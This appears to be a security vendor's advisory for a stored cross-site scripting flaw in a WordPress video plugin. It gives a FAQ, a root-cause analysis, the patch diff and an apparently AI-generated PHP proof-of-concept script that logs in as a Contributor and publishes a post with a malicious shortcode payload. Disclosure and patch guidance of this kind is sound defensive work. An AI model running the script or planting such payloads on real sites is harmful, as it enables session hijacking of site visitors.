What is CVE-2025-8072?

CVE-2025-8072 is a stored cross-site scripting (XSS) vulnerability in the Target Video Easy Publish plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject arbitrary JavaScript code via the ‘placeholder_img’ parameter.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s shortcode handler. An attacker can create a post with a malicious shortcode that includes a JavaScript payload, which executes when other users view the post.

Who is affected by this vulnerability?

All users of the Target Video Easy Publish plugin versions up to and including 3.8.8 are affected. Specifically, authenticated users with Contributor privileges or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Target Video Easy Publish plugin installed. If it is version 3.8.8 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability has been patched in version 3.8.9 of the plugin. Update to this version or later to mitigate the risk associated with CVE-2025-8072.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, it can lead to significant consequences such as session hijacking or content defacement.

What are the practical risks of this vulnerability?

Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of any user visiting the affected page. This can lead to session hijacking, unauthorized actions, and the persistence of malicious content across sessions.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can use a malicious shortcode to inject JavaScript into a post. It shows the steps to authenticate as a Contributor and create a post that triggers the XSS vulnerability when viewed by other users.

What steps should I take if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin to prevent exploitation. Additionally, review user roles and limit access to trusted users only until the plugin can be updated.

What is stored cross-site scripting?

Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts that are stored on the server and executed when users access the affected page. This type of XSS can affect all users, including administrators, leading to broader security risks.

Are there any other security measures I should consider?

In addition to updating plugins, regularly review user permissions, implement web application firewalls, and conduct security audits to identify and mitigate potential vulnerabilities in your WordPress site.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-8072: Target Video Easy Publish <= 3.8.8 – Authenticated (Contributor+) Stored Cross-Site Scripting via placeholder_img Parameter (brid-video-easy-publish)

CVE ID CVE-2025-8072

Plugin brid-video-easy-publish

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.8.8

Patched Version 3.8.9

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-8072:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Target Video Easy Publish WordPress plugin. The issue affects all plugin versions up to and including 3.8.8. Attackers with Contributor-level access or higher can inject arbitrary JavaScript payloads that execute when users view pages containing the malicious content. The CVSS score of 6.4 reflects the medium severity of this privilege-dependent stored XSS.

The root cause is insufficient input sanitization and output escaping for the ‘placeholder_img’ parameter in the plugin’s shortcode handler. The vulnerable code resides in the BridShortcode.php file, specifically within the parseShortcode() method at line 204. Before patching, the plugin directly embedded user-supplied input from the shortcode’s placeholder_img attribute into a JavaScript object without proper sanitization. The code used concatenation: $append .= ‘,”placeholder_img”:”‘ . $attrs[‘placeholder_img’] . ‘”‘.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker creates or edits a post containing a Target Video Easy Publish shortcode with a malicious placeholder_img attribute. The payload would resemble [bridtv placeholder_img=”javascript:alert(document.cookie)” placeholder=”true”]. When the post is saved and subsequently viewed, the unsanitized JavaScript payload executes in the victim’s browser context. The attack vector is the WordPress editor interface where users with appropriate permissions can insert plugin shortcodes.

The patch adds proper input sanitization and output escaping. In BridShortcode.php line 204, the code now applies three security layers: esc_html(sanitize_text_field(wp_unslash($attrs[‘placeholder_img’]))). The sanitize_text_field() function strips tags and removes line breaks, tabs, and extra whitespace. The wp_unslash() removes escaping slashes, and esc_html() encodes special characters for safe HTML output. This prevents JavaScript injection while preserving legitimate image URL functionality.

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the compromised page. This enables session hijacking, administrative actions through forged requests, content defacement, and malware distribution. The stored nature means the payload persists across sessions and affects all visitors. While Contributor privileges are required for initial injection, the payload executes for all users including administrators, potentially leading to privilege escalation.

Differential between vulnerable and patched code

Code Diff

--- a/brid-video-easy-publish/brid.php
+++ b/brid-video-easy-publish/brid.php
@@ -4,7 +4,7 @@
  * Plugin Name: TargetVideo
  * Plugin URI: https://target-video.com/
  * Description: This plugin allows for the easy insertion of <a href="https://cms.target-video.com" target="_blank">TargetVideo</a> videos and playlists into your Wordpress site or blog. TargetVideo plugin seamlessly integrates with the Wordpress Media feature and provides an easy way to publish and monetize your video library.
- * Version: 3.8.8
+ * Version: 3.8.9
  * Author: TargetVideo
  * Settings: TargetVideo
  * Author URI: https://target-video.com/
@@ -13,7 +13,7 @@

 //error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
 //DO NOT CHANGE
-define('BRID_PLUGIN_VERSION', '3.8.8'); // Also change in upper comment
+define('BRID_PLUGIN_VERSION', '3.8.9'); // Also change in upper comment
 define('DEFAULT_PLAYER_ID', '1');
 define('DEFAULT_PARTNER_ID', '264');
 define('BRID_PLUGIN_DIR', dirname(__FILE__));
--- a/brid-video-easy-publish/html/form/add_youtube.php
+++ b/brid-video-easy-publish/html/form/add_youtube.php
@@ -173,7 +173,7 @@
 							</div>
 						</div>
 					</td>
-					<td class="videoTitleTable">
+					<td class="videoTitleTable" style="padding:0 10px;">
 						<div style="float:left;width:100%;">
 							<a href="{{providerUrl}}{{id}}" id="video-title-{{id}}" class="listTitleLink" title="View on {{service}}: {{title}}" target="_blank">{{title}}</a>
 							<div class="videoUploadedBy">
--- a/brid-video-easy-publish/html/form/post/add_youtube.php
+++ b/brid-video-easy-publish/html/form/post/add_youtube.php
@@ -165,7 +165,7 @@
 			<tbody>
 				<tr id="video-row-{{id}}" data-id="{{id}}" class="partnerTr" style="background-color:{{bgColor}}">
 					<td style="width:10px;"></td>
-					<td class="imgTable">
+					<td class="imgTable" style="vertical-align:top;">
 						<div class="centerImg centerImgFix">
 							<div class="centerImgWrapper">
 								<a href="{{providerUrl}}{{id}}" title="View on {{service}}: {{title}}" target="_blank">
@@ -175,12 +175,13 @@
 							<div class="time" id="video-duration-{{id}}">{{duration}}</div>
 						</div>
 					</td>
-					<td class="videoTitleTable">
+					<td class="videoTitleTable" style="padding:0 10px;">
 						<div style="float:left;width:100%;">
 							<a href="{{providerUrl}}{{id}}" id="video-title-{{id}}" class="listTitleLink" title="View on {{service}}: {{title}}" target="_blank">{{title}}</a>
 							<div class="videoUploadedBy">
 								<div class="siteVideosNum">
 									<?php _e('By'); ?>: {{author}}   
+									<br>
 									<span style="color:#b5b5b5"><?php _e('Published'); ?>: {{published}}</span>
 									<br><br>
 									<span id="VideoStatusWrap" style="display:none">
@@ -319,6 +320,8 @@
 					}
 				}

+				jQuery("#VideoExternalUrl").val(responseData.url);
+
 				jQuery("td#td" + this.id + ' img').remove();
 				jQuery("td#td" + this.id).append('<div class="videoAdded">VIDEO ADDED!</div><div class="videoAdded2"><a href="#">EDIT IT HERE</a></div>');

--- a/brid-video-easy-publish/html/form/settings.php
+++ b/brid-video-easy-publish/html/form/settings.php
@@ -197,13 +197,10 @@
 											<small class="brid-notice"><?php _e('All your content on TargetVideo platform will be managed under this site/account'); ?>.<br /> <?php _e('To add more sites, please'); ?> <a href="https://cms.target-video.com/" target="_blank"><?php _e('login to TargetVideo'); ?></a>.</small>
 										</td>
 									</tr>
-									<?php if ($wp_ver < 5) { ?>
-										<tr>
-											<td><?php _e('Replace default player with BridTv player'); ?></td>
-											<td><?php BridForm::drawField('ovr_def', ['inputName' => 'brid_options[ovr_def]', 'type' => 'radio', 'label' => 'off']); ?></td>
-										</tr>
-									<?php } ?>
-
+									<tr>
+										<td><?php _e('Replace default player with TargetVideo player'); ?></td>
+										<td><?php BridForm::drawField('ovr_def', ['inputName' => 'brid_options[ovr_def]', 'type' => 'radio', 'label' => 'off']); ?></td>
+									</tr>
 									<tr>
 										<td><?php _e('Raw embed code'); ?></td>
 										<td><?php BridForm::drawField('raw_embed', ['inputName' => 'brid_options[raw_embed]', 'type' => 'radio', 'label' => 'off']); ?></td>
@@ -563,15 +560,27 @@
 											</small>
 										</td>
 										<td width="20%">
-											<?php if ($v['Player']['id'] == $playerSelected) { ?>
-
-												<a href="#" class="set-as-default-player default" data-model="player" data-id="<?php echo $v['Player']['id']; ?>">Default</a>
-
-											<?php } else { ?>
-
-												<a href="#" class="set-as-default-player" data-model="player" data-id="<?php echo $v['Player']['id']; ?>">Set as WP default</a>
-
-											<?php } ?>
+											<?php if ($v['Player']['id'] == $playerSelected) : ?>
+												<a
+													href="#"
+													class="set-as-default-player default"
+													data-model="player"
+													data-id="<?php echo $v['Player']['id']; ?>"
+													data-width="<?php echo $v['Player']['width']; ?>"
+													data-height="<?php echo $v['Player']['height']; ?>">
+													Default
+												</a>
+											<?php else : ?>
+												<a
+													href="#"
+													class="set-as-default-player"
+													data-model="player"
+													data-id="<?php echo $v['Player']['id']; ?>"
+													data-width="<?php echo $v['Player']['width']; ?>"
+													data-height="<?php echo $v['Player']['height']; ?>">
+													<?php _e('Set as WP default'); ?>
+												</a>
+											<?php endif; ?>
 										</td>
 									</tr>
 								<?php } ?>
@@ -658,15 +667,27 @@
 											</small>
 										</td>
 										<td width="20%">
-											<?php if ($v['Unit']['id'] == $unitSelected) { ?>
-
-												<a class="set-as-default-unit default" data-model="unit" data-id="<?php echo $v['Unit']['id']; ?>"><?php _e('Default'); ?></a>
-
-											<?php } else { ?>
-
-												<a href="#" class="set-as-default-unit" data-model="unit" data-id="<?php echo $v['Unit']['id']; ?>"><?php _e('Set as WP default'); ?></a>
-
-											<?php } ?>
+											<?php if ($v['Unit']['id'] == $unitSelected) : ?>
+												<a
+													href="#"
+													class="set-as-default-unit default"
+													data-model="unit"
+													data-id="<?php echo $v['Unit']['id']; ?>"
+													data-width="<?php echo $v['Unit']['width']; ?>"
+													data-height="<?php echo $v['Unit']['height']; ?>">
+													<?php _e('Default'); ?>
+												</a>
+											<?php else : ?>
+												<a
+													href="#"
+													class="set-as-default-unit"
+													data-model="unit"
+													data-id="<?php echo $v['Unit']['id']; ?>"
+													data-width="<?php echo $v['Unit']['width']; ?>"
+													data-height="<?php echo $v['Unit']['height']; ?>">
+													<?php _e('Set as WP default'); ?>
+												</a>
+											<?php endif; ?>
 										</td>
 									</tr>
 								<?php } ?>
@@ -1930,7 +1951,8 @@
 					e.preventDefault();
 					var type = _self.data('model');
 					var id = _self.data('id');
-
+					var width = _self.data('width');
+					var height = _self.data('height');

 					if (!_self.hasClass('default')) {
 						$Brid.Api.call({
@@ -1938,17 +1960,18 @@
 							data: {
 								action: "setBridProductDefault",
 								"id": id,
+								"width": width,
+								"height": height,
 								"type": type
 							},
 							//callback : { after : { name : "bridPlayerList"} }
 							callback: {
 								before: function() {
-
-									jQuery('.set-as-default-' + type).removeClass('default');
+									// jQuery('.set-as-default-' + type).removeClass('default');
+									jQuery('.set-as-default-player, .set-as-default-unit').removeClass('default').text('Set as WP default');
 									jQuery('.set-as-default-' + type).text('Set as WP default');
 									_self.text('Default');
 									_self.addClass('default');
-
 								}
 							}
 						});
--- a/brid-video-easy-publish/html/library.php
+++ b/brid-video-easy-publish/html/library.php
@@ -5,7 +5,7 @@
 	//Playlist selected videos
 	var selectedVideos = new Array();
 	var playlistTitle = '';
-	window.disable_shortcode = '<?php echo $disable_shortcode; ?>';
+	window.disable_shortcode = '<?php echo (int)$disable_shortcode; ?>';
 	window.CDN_Path = '<?php echo $CDN_Path; ?>';
 </script>
 <div class="supports-drag-drop" style="position: relative;">
--- a/brid-video-easy-publish/html/list/library/videos.php
+++ b/brid-video-easy-publish/html/list/library/videos.php
@@ -163,27 +163,28 @@
 <?php
 if (!empty($videosDataset['data'])) { ?>

-	<table class="list-table">
-		<?php
-		$paginationOrder = '';
-		$direction = '';
-		$field = '';
-		$pagination = $videosDataset['paging']['Video'];
+	<?php
+	$paginationOrder = '';
+	$direction = '';
+	$field = '';
+	$pagination = $videosDataset['paging']['Video'];

-		if (isset($pagination['options']['order'])) {
-			foreach ($pagination['options']['order'] as $k => $v) {
-				$paginationOrder = 'sort:' . $k . '/direction:' . $v . '/';
-				$direction = $v;
-				$field = $k;
-			}
+	if (isset($pagination['options']['order'])) {
+		foreach ($pagination['options']['order'] as $k => $v) {
+			$paginationOrder = 'sort:' . $k . '/direction:' . $v . '/';
+			$direction = $v;
+			$field = $k;
 		}
-		$paginationFields = array(
-			'Title' => array('class' => 'tableTitle', 'field' => 'Video.name'),
-			'Published' => array('class' => 'tableCreated', 'field' => 'Video.publish'),
-			'Syndication' => array('class' => 'tableCreated', 'field' => false),
-		);
+	}
+
+	$paginationFields = array(
+		'Title' => array('class' => 'tableTitle', 'field' => 'Video.name'),
+		'Published' => array('class' => 'tableCreated', 'field' => 'Video.publish'),
+		'Syndication' => array('class' => 'tableCreated', 'field' => false),
+	);
+	?>

-		?>
+	<table class="list-table">
 		<tbody>
 			<tr class="trFirst">
 				<th class="thName">
--- a/brid-video-easy-publish/html/list/playlist/playlistLibrary.php
+++ b/brid-video-easy-publish/html/list/playlist/playlistLibrary.php
@@ -68,7 +68,6 @@
 	var paginationOrder = '';
 	var saved = false;

-	jQuery('#playlistSaveAdd').css('display', 'none');
 	jQuery('#playlistSaveAdd').addClass('disabled');

 	jQuery('#copy_shortcode').css('display', 'inline-block');
@@ -120,7 +119,6 @@

 				i.addClass('details selected');

-				jQuery('#playlistSaveAdd').hide();
 				jQuery('#copy_shortcode').show();

 				var player_selected = $BridWordpressConfig.Player.id;
--- a/brid-video-easy-publish/html/playlist_library.php
+++ b/brid-video-easy-publish/html/playlist_library.php
@@ -39,7 +39,7 @@
 			<input type="text" id="brid_shortcode" style="width: 100px;height: 100px;display: none;" />
 			<div class="media-toolbar-primary">
 				<div class="mainWrapper" style='padding-top:0px;width:auto; position: absolute; right: 0px;top: 5px;width: 100%;text-align: right;'>
-					<div class="bridButton" data-redirect="off" data-colorbox-close="0" id="copy_shortcode" data-method="onPlaylistUpdate" data-form-bind="0" data-form-req="0" style="position: absolute; right: 20px; top: 5px; display:none;">
+					<div class="bridButton" data-redirect="off" data-colorbox-close="0" id="copy_shortcode" data-method="onPlaylistUpdate" data-form-bind="0" data-form-req="0" style="position: absolute; right: 0; display:none;">
 						<div class="buttonLargeContent" id="videoSaveAddText"><?php _e('COPY SHORTCODE'); ?></div>
 					</div>

--- a/brid-video-easy-publish/lib/BridActions.php
+++ b/brid-video-easy-publish/lib/BridActions.php
@@ -150,19 +150,20 @@
 	 */
 	public static function setBridProductDefault()
 	{
-
 		if (!empty($_POST)) {
 			$type = isset($_POST['type']) ? sanitize_text_field($_POST['type']) : '';
-
 			if (in_array($type, ['player', 'unit'])) {
-
 				$id = isset($_POST['id']) ? intval($_POST['id']) : 0;
+				$width = isset($_POST['width']) ? intval($_POST['width']) : 16;
+				$height = isset($_POST['height']) ? intval($_POST['height']) : 9;
 				if ($id) {
-
 					BridOptions::updateOption($type, $id);
+					BridOptions::updateOption('width', $width);
+					BridOptions::updateOption('height', $height);
 				}
 			}
 		}
+
 		die("end");
 	}

@@ -448,7 +449,7 @@
 			$BridForm = new BridForm();

 			$disable_shortcode_selectbox = [
-				"0" => "No",
+				"" => "No",
 				"1" => "Disable if SD is not encoded",
 				"2" => "Disable if ALL versions are not encoded",
 			];
--- a/brid-video-easy-publish/lib/BridApi.php
+++ b/brid-video-easy-publish/lib/BridApi.php
@@ -230,7 +230,7 @@

         if (!empty($arguments['query'])) {
             foreach ($arguments['query'] as $k => $queryPart) {
-                $arguments['query'][$k] = str_replace(":", "=", $queryPart);
+                $arguments['query'][$k] = str_replace([":", "/"], ["=", "&"], $queryPart);
             }
             $queryStr = implode('&', $arguments['query']);
             $url .= "?{$queryStr}";
--- a/brid-video-easy-publish/lib/BridHtml.php
+++ b/brid-video-easy-publish/lib/BridHtml.php
@@ -1307,7 +1307,18 @@
 	}
 }

-
+// Debug
+function dump($data)
+{
+	print "<pre>";
+	print_r($data);
+	print "</pre>";
+}
+function dd($data)
+{
+	dump($data);
+	die;
+}

 //Pre save filter to brid code
 add_filter('content_save_pre', array('BridHtml', 'my_filter_brid_iframe_to_short'), 9, 1);
--- a/brid-video-easy-publish/lib/BridShortcode.php
+++ b/brid-video-easy-publish/lib/BridShortcode.php
@@ -201,7 +201,7 @@
 				$append = ',"placeholder":"true"';

 				if (isset($attrs['placeholder_img'])) {
-					$append .= ',"placeholder_img":"' . $attrs['placeholder_img'] . '"';
+					$append .= ',"placeholder_img":"' . esc_html(sanitize_text_field(wp_unslash($attrs['placeholder_img']))) . '"';
 				}
 				if (isset($attrs['placeholder_type'])) {
 					$append .= ',"placeholder_type":"og_image"';
@@ -410,6 +410,9 @@
 			$embedCode .= '</iframe>';
 		}

+		// Add custom data to JSON: /wp-json/wp/v2/posts
+		self::restApiAddField($seoOptions);
+
 		return $embedCode;
 	}

@@ -465,6 +468,10 @@
 		$src = '';

 		$feat_image = wp_get_attachment_url(get_post_thumbnail_id(get_the_ID()));
+		$video_source = isset($atts["mp4"]) ? $atts["mp4"] : null;
+		if ($video_source == null) {
+			$video_source = isset($atts["src"]) ? $atts["src"] : "";
+		}

 		$postId = get_the_ID();
 		static $counter = 1;
@@ -474,7 +481,7 @@

 		$counter++;
 		//Front-end part
-		$src .= "<!--WP embed code replace Video object - Brid Ver {BRID_PLUGIN_VERSION} --><script type='text/javascript' src='{CLOUDFRONT}player/build/brid.min.js'></script><div id='Brid_{$divId}' class='brid' style='width: {$size['width']}; height: {$size['height']};'></div><script type='text/javascript'> $bp('Brid_{$divId}', {"id":"{$playerId}", "stats":{"wps":1}, "video": {src: "{$atts['mp4']}", name: "{htmlspecialchars(get_the_title())}", image:"{$feat_image}"}, "width":"{$size['width']}", "height":"{$size['height']}"});</script>";
+		$src .= '<!--WP embed code replace Video object - Brid Ver.' . BRID_PLUGIN_VERSION . ' --><script type="text/javascript" src="' . CLOUDFRONT . 'player/build/brid.min.js"></script><div id="Brid_' . $divId . '" class="brid" style="width: ' . $size["width"] . '; height: ' . $size["height"] . ';"></div><script type="text/javascript"> $bp("Brid_' . $divId . '", {"id":"' . $playerId . '", "stats":{"wps":1}, "video": {"src": "' . esc_attr($video_source) . '", "name": "' . htmlspecialchars(get_the_title()) . '", "image":"' . $feat_image . '"}, "width":"' . $size["width"] . '", "height":"' . $size["height"] . '"});</script>';

 		return $src;
 	}
@@ -518,6 +525,24 @@

 		return array('width' => $width, 'height' => $height);
 	}
+
+	public static function restApiAddField($seoOptions)
+	{
+		$data = [];
+		foreach (['contenturl', 'thumbnailurl'] as $name) {
+			if (isset($seoOptions[$name])) {
+				$data[$name] = $seoOptions[$name];
+			}
+		}
+
+		register_rest_field('post', 'video_data', [
+			'get_callback' => function ($post_arr) use ($data) {
+				return $data;
+			},
+			'update_callback' => null,
+			'schema' => null,
+		]);
+	}
 }

 $overrideDefaultVideo = BridOptions::getOption('ovr_def', true);

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-8072 - Target Video Easy Publish <= 3.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via placeholder_img Parameter

<?php
// Configuration
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Malicious shortcode payload - XSS via placeholder_img parameter
$malicious_shortcode = '[bridtv placeholder_img="javascript:alert(document.domain)" placeholder="true"]';
$post_title = 'Test Post with XSS Payload';
$post_content = 'This post contains a malicious Target Video Easy Publish shortcode. ' . $malicious_shortcode;

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Check authentication success by looking for dashboard redirect
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials.');
}

// Step 2: Create a new post with malicious shortcode
$nonce_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $nonce_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from the post creation page (simplified - real implementation would parse HTML)
// Note: In a real attack, the attacker would parse the _wpnonce from the form
// This PoC assumes the attacker can obtain a valid nonce through the UI

// Step 3: Submit the post with malicious shortcode
$create_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    'post_title' => $post_title,
    'content' => $post_content,
    'publish' => 'Publish',
    'post_type' => 'post',
    '_wpnonce' => 'REPLACE_WITH_VALID_NONCE', // Must be obtained from previous response
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'user_ID' => '2', // Contributor user ID
    'action' => 'editpost',
    'post_status' => 'publish'
);

curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Step 4: Verify the post was created
if (strpos($response, 'Post published') !== false || strpos($response, 'Post updated') !== false) {
    echo 'SUCCESS: Malicious post created with XSS payload in placeholder_img parameter.n';
    echo 'The shortcode ' . htmlspecialchars($malicious_shortcode) . ' will execute JavaScript when viewed.n';
} else {
    echo 'Post creation may have failed. Check permissions and nonce.n';
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-8072?
Understanding the vulnerability
CVE-2025-8072 is a stored cross-site scripting (XSS) vulnerability in the Target Video Easy Publish plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject arbitrary JavaScript code via the ‘placeholder_img’ parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s shortcode handler. An attacker can create a post with a malicious shortcode that includes a JavaScript payload, which executes when other users view the post.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the Target Video Easy Publish plugin versions up to and including 3.8.8 are affected. Specifically, authenticated users with Contributor privileges or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Target Video Easy Publish plugin installed. If it is version 3.8.8 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability has been patched in version 3.8.9 of the plugin. Update to this version or later to mitigate the risk associated with CVE-2025-8072.
What does the CVSS score of 6.4 mean?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, it can lead to significant consequences such as session hijacking or content defacement.
What are the practical risks of this vulnerability?
Potential impacts on users
Successful exploitation can allow attackers to execute arbitrary JavaScript in the context of any user visiting the affected page. This can lead to session hijacking, unauthorized actions, and the persistence of malicious content across sessions.
How does the proof of concept demonstrate the issue?
Understanding the demonstration
The proof of concept illustrates how an attacker can use a malicious shortcode to inject JavaScript into a post. It shows the steps to authenticate as a Contributor and create a post that triggers the XSS vulnerability when viewed by other users.
What steps should I take if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin to prevent exploitation. Additionally, review user roles and limit access to trusted users only until the plugin can be updated.
What is stored cross-site scripting?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts that are stored on the server and executed when users access the affected page. This type of XSS can affect all users, including administrators, leading to broader security risks.
Are there any other security measures I should consider?
Enhancing overall security
In addition to updating plugins, regularly review user permissions, implement web application firewalls, and conduct security audits to identify and mitigate potential vulnerabilities in your WordPress site.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations